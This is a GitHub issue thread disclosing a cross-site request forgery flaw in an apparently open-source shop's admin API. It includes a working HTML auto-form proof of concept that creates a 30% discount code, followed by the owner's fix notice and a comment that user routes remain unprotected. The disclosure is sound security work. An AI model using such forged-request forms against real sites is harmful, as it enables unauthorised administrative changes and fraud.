
CSRF on admin privileges #120

Closed
tuo4n8 opened this issue Feb 22, 2020 · 2 comments

Comments

@tuo4n8

tuo4n8 commented Feb 22, 2020

Hi team,
I found that admin privileges can be affected by a cross-site request forgery (CSRF) vulnerability. The admin API only checks the session, which is the reason that leads to the vulnerability.

My PoC exploits CSRF to create a discount code:

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:1111/admin/settings/discount/create" method="POST">
      <input type="hidden" name="code" value="CSRF&#45;CODE&#45;DEMO" />
      <input type="hidden" name="type" value="percent" />
      <input type="hidden" name="value" value="30" />
      <input type="hidden" name="start" value="21&#47;02&#47;2020&#32;14&#58;32" />
      <input type="hidden" name="end" value="22&#47;02&#47;2020&#32;14&#58;32" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

Video demo here

@mrvautin
Owner

Thanks for reporting. Should be fixed in cd3ba1b.

@pate313373

Why didn't you implement this fix for normal users as well?
Would be a pity if somebody ordered more than he actually thought.... :D ;)
